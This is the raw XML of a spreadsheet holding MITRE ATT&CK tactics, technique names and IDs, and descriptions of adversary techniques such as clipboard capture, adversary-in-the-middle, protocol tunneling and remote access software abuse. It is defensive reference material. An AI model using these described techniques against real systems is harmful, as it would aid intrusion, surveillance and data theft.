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8"/>
  <workbookPr defaultThemeVersion="124226"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/smeetsabalpara/Desktop/Mitre/untitled folder/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A1C642DD-B4D8-D743-ABE0-FAE800CF4B24}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="28800" windowHeight="16340" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <calcPr calcId="124519"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6016" uniqueCount="2724">
  <si>
    <t>Tactics</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>Technique Description</t>
  </si>
  <si>
    <t>Technique Detection</t>
  </si>
  <si>
    <t>Sub-Technique</t>
  </si>
  <si>
    <t>Sub-Technique Description</t>
  </si>
  <si>
    <t>Sub-Technique Detection</t>
  </si>
  <si>
    <t>Mitre Detection</t>
  </si>
  <si>
    <t>Mitigation</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Archive Collected Data
T1560</t>
  </si>
  <si>
    <t>Data from Information Repositories
T1213</t>
  </si>
  <si>
    <t>Email Collection
T1114</t>
  </si>
  <si>
    <t>Clipboard Data
T1115</t>
  </si>
  <si>
    <t>Video Capture
T1125</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle
T1557</t>
  </si>
  <si>
    <t>Input Capture
T1056</t>
  </si>
  <si>
    <t>Data from Removable Media
T1025</t>
  </si>
  <si>
    <t>Audio Capture
T1123</t>
  </si>
  <si>
    <t>Browser Session Hijacking
T1185</t>
  </si>
  <si>
    <t>Screen Capture
T1113</t>
  </si>
  <si>
    <t>Data from Local System
T1005</t>
  </si>
  <si>
    <t>Data from Configuration Repository
T1602</t>
  </si>
  <si>
    <t>Data from Network Shared Drive
T1039</t>
  </si>
  <si>
    <t>Data Staged
T1074</t>
  </si>
  <si>
    <t>Data from Cloud Storage
T1530</t>
  </si>
  <si>
    <t>Automated Collection
T1119</t>
  </si>
  <si>
    <t>Application Layer Protocol
T1071</t>
  </si>
  <si>
    <t>Dynamic Resolution
T1568</t>
  </si>
  <si>
    <t>Remote Access Software
T1219</t>
  </si>
  <si>
    <t>Protocol Tunneling
T1572</t>
  </si>
  <si>
    <t>Content Injection
T1659</t>
  </si>
  <si>
    <t>Encrypted Channel
T1573</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol
T1095</t>
  </si>
  <si>
    <t>Traffic Signaling
T1205</t>
  </si>
  <si>
    <t>Ingress Tool Transfer
T1105</t>
  </si>
  <si>
    <t>Communication Through Removable Media
T1092</t>
  </si>
  <si>
    <t>Data Encoding
T1132</t>
  </si>
  <si>
    <t>Proxy
T1090</t>
  </si>
  <si>
    <t>Non-Standard Port
T1571</t>
  </si>
  <si>
    <t>Web Service
T1102</t>
  </si>
  <si>
    <t>Fallback Channels
T1008</t>
  </si>
  <si>
    <t>Data Obfuscation
T1001</t>
  </si>
  <si>
    <t>Multi-Stage Channels
T1104</t>
  </si>
  <si>
    <t>Modify Authentication Process
T1556</t>
  </si>
  <si>
    <t>Unsecured Credentials
T1552</t>
  </si>
  <si>
    <t>Brute Force
T1110</t>
  </si>
  <si>
    <t>Network Sniffing
T1040</t>
  </si>
  <si>
    <t>Steal Application Access Token
T1528</t>
  </si>
  <si>
    <t>OS Credential Dumping
T1003</t>
  </si>
  <si>
    <t>Credentials from Password Stores
T1555</t>
  </si>
  <si>
    <t>Forced Authentication
T1187</t>
  </si>
  <si>
    <t>Forge Web Credentials
T1606</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation
T1621</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates
T1649</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception
T1111</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets
T1558</t>
  </si>
  <si>
    <t>Steal Web Session Cookie
T1539</t>
  </si>
  <si>
    <t>Exploitation for Credential Access
T1212</t>
  </si>
  <si>
    <t>Valid Accounts
T1078</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material
T1550</t>
  </si>
  <si>
    <t>Pre-OS Boot
T1542</t>
  </si>
  <si>
    <t>BITS Jobs
T1197</t>
  </si>
  <si>
    <t>Hijack Execution Flow
T1574</t>
  </si>
  <si>
    <t>XSL Script Processing
T1220</t>
  </si>
  <si>
    <t>Subvert Trust Controls
T1553</t>
  </si>
  <si>
    <t>System Binary Proxy Execution
T1218</t>
  </si>
  <si>
    <t>Impair Defenses
T1562</t>
  </si>
  <si>
    <t>Execution Guardrails
T1480</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information
T1140</t>
  </si>
  <si>
    <t>Build Image on Host
T1612</t>
  </si>
  <si>
    <t>Direct Volume Access
T1006</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion
T1497</t>
  </si>
  <si>
    <t>Debugger Evasion
T1622</t>
  </si>
  <si>
    <t>Deploy Container
T1610</t>
  </si>
  <si>
    <t>Process Injection
T1055</t>
  </si>
  <si>
    <t>Access Token Manipulation
T1134</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism
T1548</t>
  </si>
  <si>
    <t>Domain Policy Modification
T1484</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions
T1535</t>
  </si>
  <si>
    <t>Hide Artifacts
T1564</t>
  </si>
  <si>
    <t>System Script Proxy Execution
T1216</t>
  </si>
  <si>
    <t>Weaken Encryption
T1600</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification
T1222</t>
  </si>
  <si>
    <t>Indicator Removal
T1070</t>
  </si>
  <si>
    <t>Indirect Command Execution
T1202</t>
  </si>
  <si>
    <t>Template Injection
T1221</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution
T1127</t>
  </si>
  <si>
    <t>Impersonation
T1656</t>
  </si>
  <si>
    <t>Obfuscated Files or Information
T1027</t>
  </si>
  <si>
    <t>Masquerading
T1036</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure
T1578</t>
  </si>
  <si>
    <t>Network Boundary Bridging
T1599</t>
  </si>
  <si>
    <t>Rootkit
T1014</t>
  </si>
  <si>
    <t>Rogue Domain Controller
T1207</t>
  </si>
  <si>
    <t>Reflective Code Loading
T1620</t>
  </si>
  <si>
    <t>Modify Registry
T1112</t>
  </si>
  <si>
    <t>Modify System Image
T1601</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion
T1211</t>
  </si>
  <si>
    <t>Plist File Modification
T1647</t>
  </si>
  <si>
    <t>Cloud Service Discovery
T1526</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery
T1619</t>
  </si>
  <si>
    <t>Peripheral Device Discovery
T1120</t>
  </si>
  <si>
    <t>Permission Groups Discovery
T1069</t>
  </si>
  <si>
    <t>Account Discovery
T1087</t>
  </si>
  <si>
    <t>System Network Configuration Discovery
T1016</t>
  </si>
  <si>
    <t>Process Discovery
T1057</t>
  </si>
  <si>
    <t>System Network Connections Discovery
T1049</t>
  </si>
  <si>
    <t>System Service Discovery
T1007</t>
  </si>
  <si>
    <t>Cloud Service Dashboard
T1538</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery
T1580</t>
  </si>
  <si>
    <t>Software Discovery
T1518</t>
  </si>
  <si>
    <t>System Time Discovery
T1124</t>
  </si>
  <si>
    <t>Password Policy Discovery
T1201</t>
  </si>
  <si>
    <t>System Location Discovery
T1614</t>
  </si>
  <si>
    <t>Remote System Discovery
T1018</t>
  </si>
  <si>
    <t>Browser Information Discovery
T1217</t>
  </si>
  <si>
    <t>File and Directory Discovery
T1083</t>
  </si>
  <si>
    <t>Application Window Discovery
T1010</t>
  </si>
  <si>
    <t>Domain Trust Discovery
T1482</t>
  </si>
  <si>
    <t>Group Policy Discovery
T1615</t>
  </si>
  <si>
    <t>System Owner/User Discovery
T1033</t>
  </si>
  <si>
    <t>Query Registry
T1012</t>
  </si>
  <si>
    <t>Device Driver Discovery
T1652</t>
  </si>
  <si>
    <t>Network Service Discovery
T1046</t>
  </si>
  <si>
    <t>Network Share Discovery
T1135</t>
  </si>
  <si>
    <t>System Information Discovery
T1082</t>
  </si>
  <si>
    <t>Log Enumeration
T1654</t>
  </si>
  <si>
    <t>Container and Resource Discovery
T1613</t>
  </si>
  <si>
    <t>Scheduled Task/Job
T1053</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter
T1059</t>
  </si>
  <si>
    <t>Inter-Process Communication
T1559</t>
  </si>
  <si>
    <t>User Execution
T1204</t>
  </si>
  <si>
    <t>System Services
T1569</t>
  </si>
  <si>
    <t>Exploitation for Client Execution
T1203</t>
  </si>
  <si>
    <t>Native API
T1106</t>
  </si>
  <si>
    <t>Container Administration Command
T1609</t>
  </si>
  <si>
    <t>Shared Modules
T1129</t>
  </si>
  <si>
    <t>Serverless Execution
T1648</t>
  </si>
  <si>
    <t>Windows Management Instrumentation
T1047</t>
  </si>
  <si>
    <t>Cloud Administration Command
T1651</t>
  </si>
  <si>
    <t>Software Deployment Tools
T1072</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium
T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service
T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol
T1048</t>
  </si>
  <si>
    <t>Automated Exfiltration
T1020</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel
T1041</t>
  </si>
  <si>
    <t>Data Transfer Size Limits
T1030</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium
T1052</t>
  </si>
  <si>
    <t>Scheduled Transfer
T1029</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account
T1537</t>
  </si>
  <si>
    <t>Firmware Corruption
T1495</t>
  </si>
  <si>
    <t>Network Denial of Service
T1498</t>
  </si>
  <si>
    <t>Endpoint Denial of Service
T1499</t>
  </si>
  <si>
    <t>Data Destruction
T1485</t>
  </si>
  <si>
    <t>Data Encrypted for Impact
T1486</t>
  </si>
  <si>
    <t>Data Manipulation
T1565</t>
  </si>
  <si>
    <t>Service Stop
T1489</t>
  </si>
  <si>
    <t>Defacement
T1491</t>
  </si>
  <si>
    <t>System Shutdown/Reboot
T1529</t>
  </si>
  <si>
    <t>Account Access Removal
T1531</t>
  </si>
  <si>
    <t>Resource Hijacking
T1496</t>
  </si>
  <si>
    <t>Disk Wipe
T1561</t>
  </si>
  <si>
    <t>Inhibit System Recovery
T1490</t>
  </si>
  <si>
    <t>Financial Theft
T1657</t>
  </si>
  <si>
    <t>Supply Chain Compromise
T1195</t>
  </si>
  <si>
    <t>Phishing
T1566</t>
  </si>
  <si>
    <t>External Remote Services
T1133</t>
  </si>
  <si>
    <t>Drive-by Compromise
T1189</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application
T1190</t>
  </si>
  <si>
    <t>Trusted Relationship
T1199</t>
  </si>
  <si>
    <t>Hardware Additions
T1200</t>
  </si>
  <si>
    <t>Replication Through Removable Media
T1091</t>
  </si>
  <si>
    <t>Internal Spearphishing
T1534</t>
  </si>
  <si>
    <t>Remote Services
T1021</t>
  </si>
  <si>
    <t>Exploitation of Remote Services
T1210</t>
  </si>
  <si>
    <t>Lateral Tool Transfer
T1570</t>
  </si>
  <si>
    <t>Taint Shared Content
T1080</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking
T1563</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts
T1037</t>
  </si>
  <si>
    <t>Event Triggered Execution
T1546</t>
  </si>
  <si>
    <t>Create or Modify System Process
T1543</t>
  </si>
  <si>
    <t>Account Manipulation
T1098</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution
T1547</t>
  </si>
  <si>
    <t>Server Software Component
T1505</t>
  </si>
  <si>
    <t>Office Application Startup
T1137</t>
  </si>
  <si>
    <t>Power Settings
T1653</t>
  </si>
  <si>
    <t>Browser Extensions
T1176</t>
  </si>
  <si>
    <t>Create Account
T1136</t>
  </si>
  <si>
    <t>Compromise Client Software Binary
T1554</t>
  </si>
  <si>
    <t>Implant Internal Image
T1525</t>
  </si>
  <si>
    <t>Escape to Host
T1611</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation
T1068</t>
  </si>
  <si>
    <t>Search Open Websites/Domains
T1593</t>
  </si>
  <si>
    <t>Active Scanning
T1595</t>
  </si>
  <si>
    <t>Search Open Technical Databases
T1596</t>
  </si>
  <si>
    <t>Search Closed Sources
T1597</t>
  </si>
  <si>
    <t>Gather Victim Host Information
T1592</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites
T1594</t>
  </si>
  <si>
    <t>Gather Victim Identity Information
T1589</t>
  </si>
  <si>
    <t>Gather Victim Network Information
T1590</t>
  </si>
  <si>
    <t>Phishing for Information
T1598</t>
  </si>
  <si>
    <t>Gather Victim Org Information
T1591</t>
  </si>
  <si>
    <t>Obtain Capabilities
T1588</t>
  </si>
  <si>
    <t>Acquire Infrastructure
T1583</t>
  </si>
  <si>
    <t>Compromise Accounts
T1586</t>
  </si>
  <si>
    <t>Compromise Infrastructure
T1584</t>
  </si>
  <si>
    <t>Stage Capabilities
T1608</t>
  </si>
  <si>
    <t>Acquire Access
T1650</t>
  </si>
  <si>
    <t>Establish Accounts
T1585</t>
  </si>
  <si>
    <t>Develop Capabilities
T1587</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</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</si>
  <si>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 Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. 
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
For example, on Windows adversaries can access clipboard data by using &lt;code&gt;clip.exe&lt;/code&gt; or &lt;code&gt;Get-Clipboard&lt;/code&gt;.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)
macOS and Linux also have commands, such as &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)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</si>
  <si>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Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)
Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and/or high-integrity/administrator rights.
Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory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location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>Adversaries may access data from cloud storage.
Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. 
In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). 
Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.
This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)
Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)
Adversaries may inject content to victim systems in various ways, including:
* From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)
Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)</t>
  </si>
  <si>
    <t>Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: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example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).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
